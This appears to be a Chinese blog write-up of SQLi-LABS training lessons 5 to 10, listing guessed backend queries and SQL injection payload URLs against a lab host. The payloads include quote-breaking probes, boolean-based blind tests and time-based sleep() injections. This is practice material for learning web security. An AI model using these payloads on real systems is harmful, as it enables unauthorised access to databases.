SQLi-LABS Page-1(Basic Challenges) Less5-Less10
Less5
GET - Double Injection - Single Quotes
http://10.10.202.112/sqli/Less-5?id=1
http://10.10.202.112/sqli/Less-5?id=1'
http://10.10.202.112/sqli/Less-5?id=1"
You are in...........
猜测SQL语句为:
select login_name,password from table_name where id='$id' limit 0,1
构造payload
http://10.10.202.112/sqli/Less-5?id=1' and substr(@@version,1,1)=4--+ #false
http://10.10.202.112/sqli/Less-5?id=1' and substr(@@version,1,1)=5--+ #true
Less-6
GET - Double Injection - Double Quotes
http://10.10.202.112/sqli/Less-6?id=1"
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"1"" LIMIT 0,1' at line 1
猜测SQL语句应该为:
select login_name,password from table_name where id="$id" limit 0,1
http://10.10.202.112/sqli/Less-6?id=1" and substr(@@version,1,1)=4--+ #false
http://10.10.202.112/sqli/Less-6?id=1" and substr(@@version,1,1)=5--+ #true
http://10.10.202.112/sqli/Less-6?id=1" and sleep(5) and "s"="s
Less-7
GET - Dump into outfile - String
看了源码SQL语句为:
SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1
构造payload
http://10.10.202.112/sqli/Less-7?id=1')) and sleep(5) -- -
http://10.10.202.112/sqli/Less-7?id=1')) and substr(@@version,1,1)=4--+ #false
http://10.10.202.112/sqli/Less-7?id=1')) and substr(@@version,1,1)=5--+ #true
Less-8
GET - Blind - Boolian Based - Single Quotes
http://10.10.202.112/sqli/Less-8?id=1' #false
http://10.10.202.112/sqli/Less-8?id=1'--+ #true
猜测SQL:
SELECT * FROM users WHERE id='$id' LIMIT 0,1
http://10.10.202.112/sqli/Less-8?id=1' and substr(user(),1,1)='z' --+ #false
http://10.10.202.112/sqli/Less-8?id=1' and substr(user(),1,1)='r' --+ #true
Less-9
GET - Blind - Time based. - Single Quotes
源代码SQL
SELECT * FROM users WHERE id='$id' LIMIT 0,1
payload:
http://10.10.202.112/sqli/Less-9?id=1' and substr(@@version,1,1)=4 and sleep(5)--+
http://10.10.202.112/sqli/Less-9?id=1' and substr(@@version,1,1)=5 and sleep(5)--+
Less-10
GET - Blind - Time based - double quotes
http://10.10.202.112/sqli/Less-10?id=1" and 1=1 and sleep(5)--+
http://10.10.202.112/sqli/Less-10?id=1" and 1=2 and sleep(5)--+
待续。。。
点击赞赏二维码,您的支持将鼓励我继续创作!
最新文章
- JBox - 模态窗口,工具提示和消息 jQuery 插件
- Redhat Linux 修改主机名(HOSTNAME)
- Linux 内核同步机制
- Quartz所使用的表的说明
- PHP学习心得(四)——基本语法
- 12篇学通C#网络编程
- Git起步--git安装与初次运行git前配置
- BZOJ 3170: [Tjoi 2013]松鼠聚会( sort )
- JS计算字符串长度(中文算2个)
- Android Binder机制详解:手写IPC通信
- AI 新技术革命将如何重塑就业和全球化格局?深度解读 UN 报告(上篇)
- Docker入门(二)在docker使用MongoDB
- Idea+Maven创建scala项目
- java根据ip地址获取详细地域信息的方法
- MapReduce ----数据去重
- postgreSQL使用杂谈
- web@css引入方式,基本选择器,3大特性,高效运行
- InnoDB中锁的模式,锁的查看,算法
- MySQL(二)MySQL的启动或链接失败
- 解决sklearn 随机森林数据不平衡的方法